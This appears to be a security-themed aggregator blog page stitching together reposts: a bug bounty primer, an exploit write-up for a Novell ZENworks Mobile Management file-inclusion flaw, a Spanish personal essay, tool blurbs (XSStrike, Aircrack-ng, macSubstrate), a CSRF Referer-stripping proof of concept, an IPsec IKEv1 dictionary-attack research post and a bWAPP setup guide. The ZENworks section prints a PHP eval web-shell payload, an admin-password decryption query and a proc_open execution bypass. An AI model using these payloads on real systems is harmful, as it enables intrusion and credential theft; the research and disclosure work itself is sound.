søndag 26. april 2020

$$$ Bug Bounty $$$

What is Bug Bounty ?

A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.

Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.

Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.

While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

More information

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  2. Hacking Food
  3. Hacking Traduccion

lørdag 25. april 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.

For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
          $_SESSION["language"] = $Language;

if (isset($_SESSION["language"]))
     require_once( $_SESSION["language"]);
} else
     require_once( 'res\languages\English.php' );

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

if (isset($_SESSION["language"]))
     require_once( $_SESSION["language"]);
} else
     require_once( 'res\languages\English.php' );
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)

} else
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)

This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);

Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.

After we have uploaded the file we can then carry out another request to execute what has been uploaded:
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:

Update: Metasploit modules are now available as part of metasploit.

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El café sabe amargo en mi taza de Winnie The Pooh. Podría haberle echado más azúcar, pero quiero que esté así, amargo. Cercano a como es en realidad. Cuando te vas haciendo mayor disfrutas más las cosas amargas. Las cosas que te traen un sabor a la boca menos dulce. Parece que disfrutas más de los matices menos camuflados de la existencia. Son más reales.

Figura 1: Confinamiento

El café sabe amargo, ya os lo he dicho. Podría haber elegido una taza de café "normal", pero entonces no cabría tanto. Y no quiero vivir la vida a sorbos. Y tampoco soy de pensar que solo hay una forma de hacer las cosas de manera "normal". Nunca lo he sido. Me gusta pensar que eso no es ser hacker. También podría haber sacado una taza de Star Wars, de las grandes, pero esas son de mi colección.

Me apego a recuerdos. A mis pequeñas cosas que cuando las miro con la realidad aumentada de mi mirada están llenas de historias vivas que danzan frente a mis ojos. En 3D. Con música envolvente. Son casa. Son refugio. Me gusta alejarme un poco de ellos para crear nuevos recuerdos. Solo un poco. Para volver a disfrutarlos más. Y los objetos y recuerdos que vienen conmigo son yo. Son parte de mí, fueran dulces o amargos.

El café sabe amargo, pero no es intenso. Me gusta americano. Largo de agua. Aguachirri. Como lo pido siempre cuando quiero café. Sin leche. Largo como mi jornada laboral. Largo y amargo. Largo como mi pasado. Largo, espero, como mi futuro. Para sentir la experiencia durante más tiempo. Solo un poco más. Nada dura para siempre salvo en la memoria donde el tiempo se pliega. Como en la película esa de "Origen". Un sueño dentro de otro. Recursivo como los algoritmos. No se acaba. Ni lo dulce ni lo amargo. Pero el sabor del café es amargo. Y no quiero vestirlo de algo dulcificado echando mucha azúcar. Un poco para hacerlo más llevadero, puede, pero no mucho más maquillaje. Quiero sentir las cosas como son. Que duelan si tienen que doler. Que amarguen si tienen que amargar.

Mis ojos ya no son lo que eran. Están más cansaditos. Empiezan a pedir tregua de tanta lectura. De tantas letras en pantallas. De tantos mensajes que releí. De tantas y tantas hojas luchando contra mis párpados. De mi cerebro ávido por captar más de todo lo que se ve y lo que no se ve. De tantas luces en aventuras galácticas. Series de superhéroes. O de zombies que decoran el paisaje o antihéroes que van a acabar mal porque toman malas decisiones constantemente intentando avanzar. O porque la serie ya comenzó en un psiquiátrico como declaración de intenciones de lo que nos esperaba por delante.

Mis ojos ya no son lo que eran. Me piden ayuda. Mis ojos. Y se la doy a dosis pequeñas. No quiero que se acomoden. Aún no. Quiero que peleen por descifrar el mundo con sus propias herramientas. Pero de vez en cuando los consuelo. Les echo un poco de azúcar. Dejo que se acunen sobre el cristal de unas lupas de lectura. Para que aguanten más. Para que me descifren el mundo unos minutos más antes de caer rendido en la negrura de la noche.

El día es gris. Igual que ayer. Igual que el otro domingo que hizo buen día. Lo veo desde aquí. Mi sitio es el mismo que llevo ocupando durante este último mes y algo. Un rincón de la existencia con una ventana por la que veo solo un poquito del mundo analógico cuando mi foco se relaja. Solo una esquina de la vida. Por la que miro mientras me amargo mi paladar con el sabor del café. Con las gafas puestas para leer esa presentación con números y letras pequeñitas. Es mi vida. Casi enteramente mi vida es esto ahora.

El día es grande. O será que yo me siento pequeño. Como seguro que te sientes tú. Porque es como si me escondiera. Me siento un poco azul. No. No lo tomes mal. No me disgusta el color. Ni el gris ni el azul. La vida no es solo sol. La vida no es solo color amarillo. No solo luz. El azul es bonito también. Me gusta su olor. Su tacto. Y acurrucarme un rato con una de mis muchas bolitas azules. Esas que tengo en la estantería. Cojo una un rato. Me abrazo a ella. Retozo en mi sofá acurrucándola. O mirando al cielo con mi taza de Winnie The Pooh.

Mi cerebro vuela. Por el cielo. Sé que pronto saldré a jugar con las bolas amarillas. Sé que volveré a salir al parque a jugar con mis amigos. A gritar. A dar abrazos y besos. A ver un partido de fútbol. A ir a escuchar a los poetas rasgar sus guitarras. A sudar. A escuchar los gritos. A pegar los chillidos. A destrozar las canciones por no saber cantar. A mezclar el rojo con el amarillo. A mezclar el amarillo con el azul. A trepar por el monte con mi bicicleta cual motivado. A escuchar la música mientras vagabundeo en soledad por el mundo. Ese al que solo viajo yo. Por otros países. A irme a retozar con Morfeo sin tener que pelear por ello. Correr a sus brazos sin hacer cola en la frontera.

Mis palabras se amontonan. Están ahí. Guardadas. Para ti. Para las cenas. Para las charlas. Para las confesiones. Para los reencuentros. Para cuando las quieras oír. Para cuando las puedas escuchar de mi voz. Para que no sea algo digitalizado. Para que sea el sonido que emito con mis cuerdas vocales directamente. Ese que conecta directo con el motor de mi cuerpo. Ese que escribe cosas que nadie lee. Que nadie escucha. Que nadie le dicta. El inventor de los sentimientos. El pintor de las bolitas.

Mis caricias te extrañan. En los confines de mis dedos. Las noto palpitar cuando golpeo con suavidad las teclas de mi teclado. Cuando escribo algo para nadie. Pidiendo salir. Pidiendo espacio para ellas. Para que no duelan los dedos al final del día por el repiquetear constante. Para que el cansancio no sea solo mecánico sino también cuántico. Para que los dedos se muevan como olas al compás de dunas de ese desierto inmenso en soledad que queda por recorrer. Una vez más. Lentas. Eléctricas. Quemando. Como un calambre que sube por mis antebrazos y enciende el tatuaje imaginario de las llamas que nunca me hice.

La vida sigue escribiendo grietas en mi cara con tinta indeleble. En los surcos de mi piel. Donde guardo lo importante. Las risas. Los recuerdos. Los anhelos. Los planes inconclusos. Los conclusos. Con todos los metadatos. Con los recuerdos que he querido convertir en yo. En casa. Lo mejor de historia, de física y química. De arte. O incluso de filosofía sobre la vida que iba a tener pero que nunca tuve.

Mi pasado se perdió en este futuro. Porque de los mil caminos del multiverso el premio cayó en otra línea temporal. Porque la banda cambió el setlist por el camino. Porque fallé el pie de una estrofa. Porque no afinamos la canción en el mismo tempo. O porque mi diapasón se rompió por usarlo tanto a tanta velocidad. Y cada día puedo leerlos con más intensidad. Cuando me miro al espejo. Las canciones que salieron al final para el elepé son las que tengo escritas en mis arrugas. Pero aún me queda discografía que componer. Ouh, yeah!

Mis huesos me gritan. Cuando subo o bajo una escalera. Cuando recuerdo los golpes en la cadera al caerme de los patines. Cuando me levanto de la silla para preguntarle al sol qué hora es. Cuando pienso en todas las veces que necesito caerme aún. Cuando me veo volando sobre una tabla. Cuando recuerdo la negrura que viene tras la rampa. Cuando me despierto de la oscuridad y me están cosiendo la cabeza. Con sangre en los ojos. Cuando pienso en que el dolor no existe cuando el golpe es suficiente certero como para abrirte la cabeza. Y te quedas en calma para siempre. Mis huesos malvados me gritan. A veces bajito. Otras como lo hago yo cuando necesito quemar energía. O echar fuera todo.

Mi alma no te ve. No sabe donde estás. No sabe dónde te escondes. Donde se mete la gente cuando se acaba la conferencia. Donde te vas cuando acabo mi charla. Cuando me quito el gorro. Cuando ya no tengo el micrófono conectado. Cuando las fotos se acabaron. Donde estas ahora que mi mundo es este café amargo. Esta ventana analógica al mundo. Este sorbo tan pequeño de lo que es vivir. Donde todos los recuerdos bonitos de este confinamiento son solo terciopelo.

Mi televisión llora. Cuando da las noticias. Cuando dan números y números. Curvas. Gráficas. Tendencias. Nunca pensé que las matemáticas pudieran ser tan dolorosas. Cuando yo me presentaba a subir nota en matemáticas si sacaba menos de un notable. Y tengo que limpiar la pantalla con un pañuelo. Porque si no limpias las lágrimas se enraízan y ya no salen como el rocío. Y se congelan. Y el hielo corta los órganos blandos del interior. Los que están cerca de tu corazón.

Solo queda batirse. Y resistir. Y volver al mundo que está ahí fuera. Al círculo de tus brazos. Al calor de esa botella de vino. A abrazar a mi mamá con fuerza. A celebrar los cumpleaños, los santos, los acontecimientos que nos hemos saltado. A caerse al suelo y hacerse una herida en la rodilla tropezándose al correr lejos, muy lejos. A abollar el mundo saltando. A tumbarse exhausto al descender de la bicicleta por el calor, y meterse en una fuente para refrescarse del calor. A sentir cómo se te cuartea la piel con el aire y el sol de la montaña. A bucear buscando peces en mar. A chocar unas cervezas al aire con unos amigos en la barbacoa.

Saludos Malignos!

Autor: Chema Alonso (Contactar con Chema Alonso)

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XSStrike is really advanced XSS exploitation and detection suite, which contains a very powerful XSS fuzzer and provides no false positive results using fuzzy matching. XSStrike is the first XSS scanner that generates its own payloads. Download xsstrike and test it out.
It also has built in an artificial intelligent enough to detect and break out of various contexts.


  • Powerful Fuzzing Engine
  • Context Breaking Intelligence
  • AI Payload Generation
  • GET & POST Methods Support
  • Cookie Support
  • WAF Fingerprinting
  • Handcrafted Payloads to Filter and WAF Evasion
  • Hidden Parameter Discovery
  • Accurate Results


Click here to download xsstrike.

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  8. Hacking Cracking
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  10. Hacking 101
  11. Growth Hacking Examples

CSRF Referer Header Strip


Most of the web applications I see are kinda binary when it comes to CSRF protection; either they have one implemented using CSRF tokens (and more-or-less covering the different functions of the web application) or there is no protection at all. Usually, it is the latter case. However, from time to time I see application checking the Referer HTTP header.

A couple months ago I had to deal with an application that was checking the Referer as a CSRF prevention mechanism, but when this header was stripped from the request, the CSRF PoC worked. BTW it is common practice to accept empty Referer, mainly to avoid breaking functionality.

The OWASP Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet tells us that this defense approach is a baaad omen, but finding a universal and simple solution on the Internetz to strip the Referer header took somewhat more time than I expected, so I decided that the stuff that I found might be useful for others too.

Solutions for Referer header strip

Most of the techniques I have found were way too complicated for my taste. For example, when I start reading a blog post from Egor Homakov to find a solution to a problem, I know that I am going to:
  1. learn something very cool;
  2. have a serious headache from all the new info at the end.
This blog post from him is a bit lighter and covers some useful theoretical background, so make sure you read that first before you continue reading this post. He shows a few nice tricks to strip the Referer, but I was wondering; maybe there is an easier way?

Rich Lundeen (aka WebstersProdigy) made an excellent blog post on stripping the Referer header (again, make sure you read that one first before you continue). The HTTPS to HTTP trick is probably the most well-known one, general and easy enough, but it quickly fails the moment you have an application that only runs over HTTPS (this was my case).

The data method is not browser independent but the about:blank trick works well for some simple requests. Unfortunately, in my case the request I had to attack with CSRF was too complex and I wanted to use XMLHttpRequest. He mentions that in theory, there is anonymous flag for CORS, but he could not get it work. I also tried it, but... it did not work for me either.

Krzysztof Kotowicz also wrote a blog post on Referer strip, coming to similar conclusions as Rich Lundeen, mostly using the data method.

Finally, I bumped into Johannes Ullrich's ISC diary on Referer header and that led to me W3C's Referrer Policy. So just to make a dumb little PoC and show that relying on Referer is a not a good idea, you can simply use the "referrer" meta tag (yes, that is two "r"-s there).

The PoC would look something like this:
<meta name="referrer" content="never">
<form action="https://vistimsite.com/function" method="POST">
<input type="hidden" name="param1" value="1" />
<input type="hidden" name="param2" value="2" />


As you can see, there is quite a lot of ways to strip the Referer HTTP header from the request, so it really should not be considered a good defense against CSRF. My preferred way to make is PoC is with the meta tag, but hey, if you got any better solution for this, use the comment field down there and let me know! :)

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The Remote Exploit Development Team has just announced BackTrack 4 Beta. BackTrack is a Linux based LiveCD intended for security testing and we've been watching the project since the very early days. They say this new beta is both stable and usable. They've moved towards behaving like an actual distribution: it's based on Debian core, they use Ubuntu software, and they're running their own BackTrack repositories for future updates. There are a lot of new features, but the one we're most interested in is the built in Pico card support. You can use the FPGAs to generate rainbow tables and do lookups for things like WPA, GSM, and Bluetooth cracking. BackTrack ISO and VMWare images are available here.

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torsdag 23. april 2020

DeepEnd Research: Analysis Of Trump's Secret Server Story

 We posted our take on the Trump's server story. If you have any feedback or corrections, send me an email (see my blog profile on Contagio or DeepEnd Research)

Analysis of Trump's secret server story...

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onsdag 22. april 2020

Aircrack-ng: The Next Generation Of Aircrack

"Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks." read more...

Website: http://www.aircrack-ng.org

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macSubstrate - Tool For Interprocess Code Injection On macOS

macSubstrate is a platform tool for interprocess code injection on macOS, with the similar function to Cydia Substrate on iOS. Using macSubstrate, you can inject your plugins (.bundle or .framework) into a mac app (including sandboxed apps) to tweak it in the runtime.
  • All you need is to get or create plugins for your target app.
  • No trouble with modification and codesign for the original target app.
  • No more work after the target app is updated.
  • Super easy to install or uninstall a plugin.
  • Loading plugins automatically whenever the target app is relaunched.
  • Providing a GUI app to make injection much easier.

  • Disable SIP
  • Why should disable SIP
    System Integrity Protection is a new security policy that applies to every running process, including privileged code and code that runs out of the sandbox. The policy extends additional protections to components on disk and at run-time, only allowing system binaries to be modified by the system installer and software updates. Code injection and runtime attachments to system binaries are no longer permitted.

  1. download macSubstrate.app, put into /Applications and launch it.
  2. grant authorization if needed.
  3. install a plugin by importing or dragging into macSubstrate.
  4. launch the target app.
    step 3 and step 4 can be switched
    Once a plugin is installed by macSubstrate, it will take effect immediately. But if you want it to work whenever the target app is relaunched or macOS is restarted, you need to keep macSubstrate running and allow it to automatically launch at login.
  5. uninstall a plugin when you do not need it anymore.

macSubstrate supports plugins of .bundle or .framework, so you just need to create a valid .bundle or .framework file. The most important thing is to add a key macSubstratePlugin into the info.plist, with the dictionary value:
Key Value
TargetAppBundleID the target app's CFBundleIdentifier, this tells macSubstrate which app to inject.
Description brief description of the plugin
AuthorName author name of the plugin
AuthorEmail author email of the plugin
Please check the demo plugins demo.bundle and demo.framework for details.

Xcode Templates
macSubstrate also provides Xcode Templates to help you create plugins conveniently:
  1. ln -fhs ./macSubstratePluginTemplate ~/Library/Developer/Xcode/Templates/macSubstrate\ Plugin
  2. Launch Xcode, and there will be 2 new plugin templates for you.

  1. SIP is a new security policy on macOS, which will help to keep you away from potential security risk. Disable it means you will lose the protection from SIP.
  2. If you install a plugin from a developer, you should be responsible for the security of the plugin. If you do not trust it, please do not install it. macSubstrate will help to verify the code signature of a plugin, and I suggest you to scan it using VirusTotal. Anyway, macSubstrate is just a tool, and it is your choice to decide what plugin to install.

More info

tirsdag 21. april 2020

Practical Dictionary Attack On IPsec IKE

We found out that in contrast to public knowledge, the Pre-Shared Key (PSK) authentication method in main mode of IKEv1 is susceptible to offline dictionary attacks. This requires only a single active Man-in-the-Middle attack. Thus, if low entropy passwords are used as PSKs, this can easily be broken.

This week at the USENIX Security conference, Dennis Felsch will present our research paper on IPsec attacksThe Dangers of Key Reuse: Practical Attacks on IPsec IKE. [alternative link to the paper]

In his blog post, Dennis showed how to attack the public key encryption based authentication methods of IKEv1 (PKE & RPKE) and how to use this attack against IKEv2 signature based authentication method. In this blog post, I will focus on another interesting finding regarding IKEv1 and the Pre-Shared Key authentication.

IPsec and Internet Key Exchange (IKE)

IPsec enables cryptographic protection of IP packets. It is commonly used to build VPNs (Virtual Private Networks). For key establishment, the IKE protocol is used. IKE exists in two versions, each with different modes, different phases, several authentication methods, and configuration options. Therefore, IKE is one of the most complex cryptographic protocols in use.

In version 1 of IKE (IKEv1), four authentication methods are available for Phase 1, in which initial authenticated keying material is established: Two public key encryption based methods, one signature based method, and a PSK (Pre-Shared Key) based method.

The relationship between IKEv1 Phase 1, Phase 2, and IPsec ESP. Multiple simultaneous Phase 2 connections can be established from a single Phase 1 connection. Grey parts are encrypted, either with IKE derived keys (light grey) or with IPsec keys (dark grey). The numbers at the curly brackets denote the number of messages to be exchanged in the protocol.

Pre-Shared Key authentication

As shown above, Pre-Shared Key authentication is one of three authentication methods in IKEv1. The authentication is based on the knowledge of a shared secret string. In reality, this is probably some sort of password.

The IKEv1 handshake for PSK authentication looks like the following (simplified version):

In the first two messages, the session identifier (inside HDR) and the cryptographic algorithms (proposals) are selected by initiator and responder. 

In messages 3 and 4, they exchange ephemeral Diffie-Hellman shares and nonces. After that, they compute a key k by using their shared secret (PSK) in a PRF function (e.g. HMAC-SHA1) and the previously exchanged nonces. This key is used to derive additional keys (ka, kd, ke). The key kd is used to compute MACI over the session identifier and the shared diffie-hellman secret gxy. Finally, the key ke is used to encrypt IDI (e.g. IPv4 address of the peer) and MACI

Weaknesses of PSK authentication

It is well known that the aggressive mode of authentication in combination with PSK is insecure and vulnerable against off-line dictionary attacks, by simply eavesedropping the packets. For example, in strongSwan it is necessary to set the following configuration flag in order to use it:

For the main mode, we found a similar attack when doing some minor additional work. For that, the attacker needs to waits until a peer A (initiator) tries to connect to another peer B (responder). Then, the attacker acts as a man-in-the middle and behaves like the peer B would, but does not forward the packets to B.

From the picture above it should be clear that an attacker who acts as B can compute (gxy) and receives the necessary public values session ID, nI, nR. However, the attacker does not know the PSK. In order to mount a dictionary attack against this value, he uses the nonces, and computes a candidate for for every entry in the dictionary. It is necessary to make a key derivation for every k with the values of the session identifiers and shared Diffie-Hellmann secret the possible keys ka, kd and ke. Then, the attacker uses ke in order to decrypt the encrypted part of message 5. Due to IDI often being an IP address plus some additional data of the initiator, the attacker can easily determine if the correct PSK has been found.

Who is affected?

This weakness exists in the IKEv1 standard (RFC 2409). Every software or hardware that is compliant to this standard is affected. Therefore, we encourage all vendors, companies, and developers to at least ensure that high-entropy Pre-Shared Keys are used in IKEv1 configurations.

In order to verify the attack, we tested the attack against strongSWAN 5.5.1.


We have implemented a PoC that runs a dictionary attack against a network capture (pcapng) of a IKEv1 main mode session. As input, it also requires the Diffie-Hellmann secret as described above. You can find the source code at github. We only tested the attack against strongSWAN 5.5.1. If you want to use the PoC against another implementation or session, you have to adjust the idHex value in main.py.

Responsible Disclosure

We reported our findings to the international CERT at July 6th, 2018. We were informed that they contacted over 250 parties about the weakness. The CVE ID for it is CVE-2018-5389 [cert entry].


On August 10th, 2018, we learned that this attack against IKEv1 main mode with PSKs was previously described by David McGrew in his blog post Great Cipher, But Where Did You Get That Key?. We would like to point out that neither we nor the USENIX reviewers nor the CERT were obviously aware of this.
On August 14th 2018, Graham Bartlett (Cisco) email us that he presented the weakness of PSK in IKEv2 in several public presentations and in his book.
On August 15th 2018, we were informed by Tamir Zegman that John Pliam described the attack on his web page in 1999.


  • Do you have a name, logo, any merchandising for the attack?
  • Have I been attacked?
    We mentioned above that such an attack would require an active man-in-the-middle attack. In the logs this could look like a failed connection attempt or a session timed out. But this is a rather weak indication and no evidence for an attack. 
  • What should I do?
    If you do not have the option to switch to authentication with digital signatures, choose a Pre-Shared Key that resists dictionary attacks. If you want to achieve e.g. 128 bits of security, configure a PSK with at least 19 random ASCII characters. And do not use something that can be found in public databases.
  • Am I safe if I use PSKs with IKEv2?
    No, interestingly the standard also mentions that IKEv2 does not prevent against off-line dictionary attacks.
  • Where can I learn more?
    You can read the paper[alternative link to the paper]
  • What else does the paper contain?
    The paper contains a lot more details than this blogpost. It explains all authentication methods of IKEv1 and it gives message flow diagrams of the protocol. There, we describe a variant of the attack that uses the Bleichenbacher oracles to forge signatures to target IKEv2. 

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Ethical Hackers Platform: How To Install A bWAPP In Windows 2018

bWAPP, or a buggy web application, is a free and open source deliberately insecure web application. It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects.

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It covers all major known web bugs, including all risks from the OWASP Top 10 project.  bWAPP is for web application security-testing and educational purposes only.

Have fun with this free and open source project!
bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows with Apache/IIS and MySQL. It can also be installed with WAMP or XAMPP. Another possibility is to download the bee-box, a custom Linux VM pre-installed with bWAPP.

First of all you have need to install a local server over system that may be XAMPP, WAMP or LAMP. These servers are totally free of cost you can freely download from the internet. Mostly XAMPP is used because it has more functionalities than others on the other hand WAMP is also a simple platform for PHP while, LAMP is used over the Linux distributions. After downloading any one of them you have need to install that first after that you'll be able to configure bWAPP over your system.

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